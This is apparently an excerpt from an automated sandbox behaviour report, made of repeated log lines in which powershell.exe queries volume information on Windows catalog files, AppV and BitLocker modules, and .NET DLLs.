                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
